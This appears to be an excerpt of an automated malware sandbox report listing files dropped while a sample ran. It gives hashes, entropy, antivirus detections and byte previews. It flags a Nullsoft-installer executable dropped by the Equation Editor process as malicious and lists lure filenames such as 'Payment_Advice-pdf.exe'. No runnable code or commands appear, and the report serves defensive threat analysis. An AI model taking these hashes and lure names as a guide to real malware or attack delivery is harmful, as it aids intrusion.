                                                File Type:SQLite 3.x database, last written using SQLite version 3024000, file counter 15, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                Category:dropped
                                                Size (bytes):61440
                                                Entropy (8bit):3.576067987433191
                                                Encrypted:false
                                                SSDEEP:384:neh9dTh+tELJ8DAcLKuZsLRGlKhsvXh+vSc:DAeZsLQhUSc
                                                MD5:AE8579F67149D36E57EDC20F2DCA75B7
                                                SHA1:695F81379729CDB1152B7A900D5C3A8D9B1A2D67
                                                SHA-256:1B79715B51CD5CA5FA15B0227E372BCC09A1330B76C70E9F7E9B5CAF5C5D1DDB
                                                SHA-512:C7F27D921C34D71328DFC6E6A5D609B2EC49786C653928A77614C70C8C8A6584B600A283F33C0A3E546D114D9B9EFA4C6DF24069056006E24410F13A0B925642
                                                Malicious:false
                                                Reputation:low
                                                Preview:SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                File Type:SQLite Rollback Journal
                                                Category:dropped
                                                Size (bytes):8720
                                                Entropy (8bit):3.3121723059304196
                                                Encrypted:false
                                                SSDEEP:48:7Mu2iomVmBsmom1CZqiomSfom1Nom1Aiom1RROiom1Com1pom1zXiomVPiomgOqn:7gCm6rUkhHCPOd49IVXEBodRBkN
                                                MD5:A7D1D323808F5F7EA0CFED1D2735FF67
                                                SHA1:6455B00C18FA0A4AB3C84B4EB77003CA87F94D3B
                                                SHA-256:F39543E5BC72F835F74B274F6C5C33D75EDD21459FFEDD6FA5736D817E86B820
                                                SHA-512:7EC826DAC1BA8AAE2221C1D5D5750DB1CEAB9931F7B00CAC52F758A4077324FC9CB292B138CFB6A38D42C59D3574F0AD467C976C710E287AE53A8595155FC9AD
                                                Malicious:false
                                                Preview:.... .c......].+..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W....X.W.L...y.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):1035
                                                Entropy (8bit):5.14859305498125
                                                Encrypted:false
                                                SSDEEP:24:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBmid8HxPs3yTTtPmid8OPgx4s3yTDHBa:1kxPuyvthNgx4uyHfkxPuyvthNgx4uyw
                                                MD5:FCE71B64BAF106F5C0927EECEFEA6C02
                                                SHA1:4F77E36BB83232845C873C7063FFE1AA00BB19FA
                                                SHA-256:508A2291423497E590A1055F310905F1F3EECC479BEE0A11E0C6583763947FC9
                                                SHA-512:7C1DD4A949EDFA90D06886827253C8A18AFA3DD80ED281D1A8613DD0BED8742F63FF0542545F0360C60F0B591BF4AFFCD52F8DDDAD2FD92E92D23100EC9E1FDE
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:276
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):9566
                                                Entropy (8bit):5.226610011802065
                                                Encrypted:false
                                                SSDEEP:192:eTA2j6Q6T766x626Oz6r606+6bfs6JtRZ65tsu6rtG16lMXY5B5Cfk:es4p0vTLcdfIfsmtRZEtsuatG1gMIzV
                                                MD5:63B24EA3A13EAC476D6309BB202EF459
                                                SHA1:89502C393549C20C933E4553F51F74F3DBE085EF
                                                SHA-256:2B4BE0BED267BBD4E4FFFC912A6C7ED6A8D4735DCF9B69FF90F37CDDEF4110EA
                                                SHA-512:2CB315DD00867DEE3A2CBC4017B59C53B41E817216FE0111A60947E1F0D81FF6767D8F7B5C406AAF9E6516BE716A086642AFFABBEFBE4C5B260437C89E3535EC
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426577650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):260308
                                                Entropy (8bit):2.2945364945354627
                                                Encrypted:false
                                                SSDEEP:1536:ulNTBeJFFFFFFp7HDyWC+MoEgpPvrtpyxxxxxxVzS:uADyt+MoEgpP
                                                MD5:C0CC8885F2F437FE0C4D63A783C8A882
                                                SHA1:D6C4FF19817095D12AA65CB17DCFAEF2E5B88284
                                                SHA-256:52886A7220F413A6180878EE4D58E30E27D0E64EAED92BA1BFB77223A4708D77
                                                SHA-512:7BF5BE73133C06990AFFF614B1DE8D116C452102B62BF39787219A02425BA921F499F1030726F93FEA7F4B5BFE93CF8C83AA0FBA2047AA91D652226182EA13CC
                                                Malicious:false
                                                Preview:Adobe Acrobat Reader DC 19.0....?A12_FindInDocument.............................................................................................................................................ppp.ppp`ppp.ppp.ppp.ppp.ppppppp ............................................................ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp ............................................ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp0........................................ppp.ppp.ppp.ppp.pppP................ppp0ppp.ppp.ppp.ppp.ppp0................................ppp.ppp.ppp.ppp.ppp.............................ppp`ppp.ppp.ppp.............................ppp.ppp.ppp.ppp.ppp.....................................ppp.ppp.ppp.ppp`........................ppp`ppp.ppp.pppP........................................ppp.ppp.ppp.ppp.........................ppp.ppp.ppp.........ppp.............ppp.........ppp.........ppp.ppp.ppp.........................ppp.ppp.ppp.....ppp0ppp.ppp`....ppp`ppp.ppp0ppp.ppp.ppp.....
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):72643
                                                Entropy (8bit):5.393779678652009
                                                Encrypted:false
                                                SSDEEP:768:PCbTjMYOpdyVFWqnPvBRSiRkTIVzY3Z4nMaKYDlXZYyu:AlOpdyVFWcPvBBRkTIdY3SpZK
                                                MD5:94E97053E3BC849C74AD304FAE464E83
                                                SHA1:A203517E488418E3F846DA04CEDD39A82020F8B2
                                                SHA-256:B2EB8313F09FF7E315BEE69391F11E06D50895E57F90810108AED97155C4767C
                                                SHA-512:A9BF907D89F8A8BD489CE6453E4FA95DC25B1ED05E224C3FB2D762123D87F4F02792BC4674EEDD09A9B06106A343BFE8A9038BCE7CD769AAB477DCCFE87B7E0C
                                                Malicious:false
                                                Preview:4.458.88.FID.2:o:........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.94.FID.2:o:........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.82.FID.2:o:........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.85.FID.2:o:........:F:Aparajita.P:Aparajita.L:&.........................."F:Aparajita.#.99.FID.2:o:........:F:Aparajita-Italic.P:Aparajita Italic.L:&.........................."F:Aparajita.#.95.FID.2:o:........:F:Aparajita-Bold.P:Aparajita Bold.L:&.........................."F:Aparajita.#.108.FID.2:o:........:F:Aparajita-BoldItalic.P:Aparajita Bold Italic.L:&.........................."F:Aparajita.#.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$....
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):1272864
                                                Entropy (8bit):7.983367304390116
                                                Encrypted:false
                                                SSDEEP:24576:ZQ3IGHgEKN05uKEPfbze1J9c8ae1D1FkTaO/bwntZKo4PCnsoO+Lt:ZQ3IbGEf+X9Xtk2O/bw7KpCnsa5
                                                MD5:6E8215EEE3034D6DCF18D79D397E5715
                                                SHA1:5612BFF0830A9A025EB35CF7C054D2062745D1B9
                                                SHA-256:AC4761C259DAEDE4B4EFB78816C98FB56344E381BB56D69EA897C30C9899BF39
                                                SHA-512:5B5A08E02C7F58F25A436508848F90D397C2545B474F37202CEF5F8BA9D4924761E500A2D54E082F51EABD80B2CC33D21D73B45206D79E64C7BB0CE21ABF83C1
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 32%
                                                • Antivirus: Virustotal, Detection: 32%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.*....F..G.w.F.*....F..v..F...@..F.Rich.F.........PE..L......].................`..........52.......p....@.......................................@.................................0t.......................T...............................................................p...............................text...}_.......`.................. ..`.rdata..>....p.......d..............@..@.data................x..............@....ndata...`...@...........................rsrc................|..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):330948
                                                Entropy (8bit):4.9725570532731105
                                                Encrypted:false
                                                SSDEEP:3072:x0Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:x0Bd8yCKdQRzw4muaZ9TARfMDcFi
                                                MD5:650597A7FDBDF9A4DB26282FC4650C97
                                                SHA1:101C0429EC666765CDBEB112AA211EA29FA43058
                                                SHA-256:8900A8D37CE8BFAADA8ADDF1FAB7B4DFC616FB0FA3D2A482A207BD60A3C46676
                                                SHA-512:3DA8D40F5A949B1F62878654AB444B96893F91B63114ADA97EB9FD7D7E9FDA593E7553EDE052934397906D730323F2D10C81813B2CBFE78A0AE2D487677EE6F2
                                                Malicious:false
                                                Preview:....l...........0...%............K...8.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):884312
                                                Entropy (8bit):1.2944875740888722
                                                Encrypted:false
                                                SSDEEP:1536:k3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:5ux/ZiOE85e+8J2dvRcvMyw
                                                MD5:B6DFB3AA7AC4A1A52336C30FA821857B
                                                SHA1:66ECB808A516AC5B07A01CDFCAD65FD7B9907619
                                                SHA-256:E22202331F689D7568E674B0DCD895DF66FAC5980498F05A846DE244AB3394C4
                                                SHA-512:A13562F976BCBEEF7D4B4926C37E39BFD4C588EF6E746792B806E6737C91604175395021D4884493D764CE7F0EE2ACC6C7D03A6045A5B4ED6616E5D7E4C9FE94
                                                Malicious:false
                                                Preview:....l............................F..C%.. EMF....X~..............................@................................................................F..C%..................Q....}..........................................P...(...x...$}...... ....F..C%..(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):1505804
                                                Entropy (8bit):1.5719113060369843
                                                Encrypted:false
                                                SSDEEP:1536:YTg8p9E9G919NmVVg999vM9W9+99rjx9VwwI2o9l9O9c99999d93feVr2rX6tb71:Igev7w1qbEn0cK1biej15fde
                                                MD5:AB3C71DADD57C96DE74236A677761633
                                                SHA1:B1831C9C1D2276395D10AAA35D0A837A1E51C31C
                                                SHA-256:BE0B0602293E0078A54D37F29B03C21091D4450EDCF827A577D376E670A2C445
                                                SHA-512:D8A711A9F27244CB49F5C9813F2B11B5300A4D48BD30477110F33B08551696CB0FB52DCE072F6C962B04CB57CDAD14C16CF25C675683D65C61B88B2B05BB9354
                                                Malicious:false
                                                Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):1504468
                                                Entropy (8bit):1.053474355446965
                                                Encrypted:false
                                                SSDEEP:6144:mmA9GHd0sV3GzfRnt9lGnz+CdHKz91sLW9TOuKPUWkGWzAOvRbNAvY:mmndNGzJnYnz+1z997K0zD
                                                MD5:35E141964E2698FC12D087516D116C9A
                                                SHA1:E2E0713E181633BB4D5247D5B37A7FF854165538
                                                SHA-256:6A3A2ADDC5D6B554EED64B7C24B699E09BCF019E4F42AB14EC6D40C7CB749538
                                                SHA-512:70CF79F2CDAC3065E5EF644A666358ADAACAB8F1B4E458BAA9B9057AD1B3EE1DD432F6EDE973FB76A60F8945D31A8DDB5E04B34912DF292C7D8B752AE39F3F4E
                                                Malicious:false
                                                Preview:....l...........I...R............:...).. EMF................................8...X....................?...........................................:...)..........J...S...Q...............I...R...................J...S...P...(...x........... ....:...)..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):884312
                                                Entropy (8bit):1.2944965349348616
                                                Encrypted:false
                                                SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                Malicious:false
                                                Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):433328
                                                Entropy (8bit):5.820383898498903
                                                Encrypted:false
                                                SSDEEP:6144:Wifm7kwvqU4iyCbPUV7gdaI6z0R/sjBx2:Wl7kwvqULUVS
                                                MD5:6DA3C83DC31817ECE4A6D2DAB9F304D5
                                                SHA1:501068A7C53E59450D130658C547092C21074685
                                                SHA-256:8AB3AFA5BE9C1891C1622C8D350A2266BBB1829D73C4B22CEB184107FEB413C2
                                                SHA-512:E1A2C6B0CEC5533F34E3086A75D4FDE55F8E8F32B3665976EF95790EA2C015AC6D88D66EB584C5EE83AFA81CDC5EDBCAC995B9AC4966CFC4D7C37D568D01304C
                                                Malicious:false
                                                Preview:....l...........[................S..%;.. EMF........t...........................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\.......'.......................%...........................................................L...d.......D...[...........D...\...D...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):4056
                                                Entropy (8bit):1.9017483361098562
                                                Encrypted:false
                                                SSDEEP:24:YOu6PJqRixxBBBQAAJnHbG/KD3ql/mfzG/S6ATn9eDIb6eD/qLvae:9u6IRixxBBBQlJatF6n8g/wae
                                                MD5:8F636083CE616F8EB610556C57CC3CAA
                                                SHA1:4291DA8874EF4A60300F4BAAEC84F5A4A425E31E
                                                SHA-256:62E41677B9A6F9B0139BB4D5EAA890F1423F707383A960FFA261A7C4A677F3EB
                                                SHA-512:78FF54528C73E9E52C67FC8536BDA2628F4177ACDC9E749F4EAF69639F82E468B3766AEACD4F24BABCB30227572B2F522FDDF2FBD8B790C474ACF313BD32C84A
                                                Malicious:false
                                                Preview:....l............................+..g... EMF....................................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):330948
                                                Entropy (8bit):4.97334923560013
                                                Encrypted:false
                                                SSDEEP:3072:90Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:90Bd8yCKdQRzw4muaZ9TARfMDcFi
                                                MD5:AB48787880885634A344F86D1C0C10AF
                                                SHA1:A69E772598EF1AF9643A27ACEA65C200B2B08CCF
                                                SHA-256:1EA71086D644AC428917E838640E4A89971603C783A86C735A14625D41FB9E86
                                                SHA-512:A0548F45F02FEF90637A35144D570C420CDB5A2BF424464A6732482E27475D6E51AB3ACD3DE32B69E51CB8D6570D004B8612AD71526EEC5A77E249A05DE3156B
                                                Malicious:false
                                                Preview:....l...........0...%............K...8.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):4056
                                                Entropy (8bit):1.929653848333741
                                                Encrypted:false
                                                SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
                                                MD5:4A103FC1809C8EA381D2ACB5380EF4F6
                                                SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
                                                SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
                                                SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
                                                Malicious:false
                                                Preview:....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):1504468
                                                Entropy (8bit):1.0537541658250373
                                                Encrypted:false
                                                SSDEEP:6144:bmA9GwdUsV3ez/Rnd9lGHze2dHCz91j5WC/eu5PUWkGGzdQvRbNAvY:bmQdtezpnoHzeJz9Hr5Ezk
                                                MD5:082CF1F806641FD07D90C27CB5C263B0
                                                SHA1:28F7C5C949EFAFBD423EF6EDCDBDD349AFD48E34
                                                SHA-256:D6A38D2F039E2A2B5D1B7F48B8DE552E89107B8197D156F04F54FC23C22AC83B
                                                SHA-512:E14ACD45AB9F52A76D7E34E6C5C4003501446BB0D6F7D4FC4DC3A0AEE6A3E5F8E41AA9C216D4D5DB39C02086AA4CBED7FB60D6119897708AD2BF0B3E6D7376F7
                                                Malicious:false
                                                Preview:....l...........I...R...........:R..y6.. EMF....................................@...............................................................:R..y6..........J...S...Q...............I...R...................J...S...P...(...x........... ...:R..y6..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):1505804
                                                Entropy (8bit):0.6261172420512388
                                                Encrypted:false
                                                SSDEEP:1536:1MPrTq5X4MeOVPzBymPhVPSH4xfUXFfvbU77iCxlGjD+ysfh7Lhp:1MPXYPzPXc11v47Lhp
                                                MD5:EA2F978ED2B6A8F223F1CD74C19EBAED
                                                SHA1:C0AFB52EE10DE4CBE2DDD33E6F7D78734A911D54
                                                SHA-256:F9B575F956E6EF698500243A135B913C6DF7680E401941A313ABCFF5A553AAE3
                                                SHA-512:A02D3F41ED12FB51AC7C6A13680AB9220F76AEEEA9B287AB30E23A6168552F28F4AA6A74798B16B90245241872A292732A16C76EAD53AF8EE1E1F475626D88CE
                                                Malicious:false
                                                Preview:....l...........R...I............:...M.. EMF....................................@................................................................:...M..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....:...M..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):1505804
                                                Entropy (8bit):0.6261842732011597
                                                Encrypted:false
                                                SSDEEP:1536:GMPrTmqNX4MeOVPzBymPhVPSH4xsUXFfvbU77iCxlGjD+ysfh/mGG:GMPW0PzPXr11v4/mGG
                                                MD5:A01B9617553432807B9B58025B338D97
                                                SHA1:439BDCC450408B9735B2428C2D53D2E6977FA58C
                                                SHA-256:7A0426ED2E2349916969FF7087C0F76089FB8CE7F4627F3D11CCBC1AAEFCEDCE
                                                SHA-512:312CC2563FA865D6A939FEA85A520627C73ED9A95BAFC98C89495F21D535DC658825BE74B64F0F5C5815D1D234FC6E77A71779247E4973E39BA8DCCEC2F09BEE
                                                Malicious:false
                                                Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):433328
                                                Entropy (8bit):5.820133177370174
                                                Encrypted:false
                                                SSDEEP:6144:iifm7kwvqU4iyCbPUV7gdaI6z0R/sjBx2:il7kwvqULUVS
                                                MD5:2824C456965D260BD2D39BDCF5F8998E
                                                SHA1:C0885618FF2F9F1B0ED9D8F439EEEDF101BFED6D
                                                SHA-256:017D77EF5FB7B5FCCF22E44BC3EF915E4F5DB233788F3D06A12BD7D4219ECE03
                                                SHA-512:2F5BF11288E8FD26BE4CFB9392B0F7B2F7FA139365FD703E45CCE6106D25E41E825DEAEF61E77C199F22369669BE338B173D444C5EC85CC46DFB9D197F59D44A
                                                Malicious:false
                                                Preview:....l...........[................S..%;.. EMF........t...........................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\.......'.......................%...........................................................L...d.......D...[...........D...\...D...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):1505804
                                                Entropy (8bit):1.5719178360001411
                                                Encrypted:false
                                                SSDEEP:1536:vTg8p9E9G919NmVVg999vM9W9+99rjx9VwwI2o9l9O9c99999d93feVr2rX6tb71:Lgev7w1qbEn0cK1biej15fde
                                                MD5:AAC2F32AB03AE5AB1CB5AAB302B66F38
                                                SHA1:22EB1218444F24A7FCA07FF12423A8C0A106EECA
                                                SHA-256:FA311118907A83D6EF5A2AF80D55284797D74055CE2BBB4B3367755F2FEBED3E
                                                SHA-512:1475AA846E5E17FB528B849643E9A875D10265D4D55459430918F3EBC570D6598D2C77CAF3FBC1FA3B15554FA3748D9A4888085F08F2E1A33CEA6F78DBE402A5
                                                Malicious:false
                                                Preview:....l...........R...I............:...M.. EMF....................................@................................................................:...M..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....:...M..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):5.854901984552606
                                                Encrypted:false
                                                SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                MD5:0063D48AFE5A0CDC02833145667B6641
                                                SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                • Filename: Part_number_91875-11400_x_6.xls, Detection: malicious, Browse
                                                • Filename: 3CoQ2gnbIu.exe, Detection: malicious, Browse
                                                • Filename: 3CoQ2gnbIu.exe, Detection: malicious, Browse
                                                • Filename: Zc8N38ZHPi.exe, Detection: malicious, Browse
                                                • Filename: Zc8N38ZHPi.exe, Detection: malicious, Browse
                                                • Filename: SOA_OCT.exe, Detection: malicious, Browse
                                                • Filename: SOA_OCT.exe, Detection: malicious, Browse
                                                • Filename: Cargo_manifest_&_BL_10784813.exe, Detection: malicious, Browse
                                                • Filename: Cargo_manifest_&_BL_10784813.exe, Detection: malicious, Browse
                                                • Filename: Payment_Advice-pdf.exe, Detection: malicious, Browse
                                                • Filename: Payment_Advice-pdf.exe, Detection: malicious, Browse
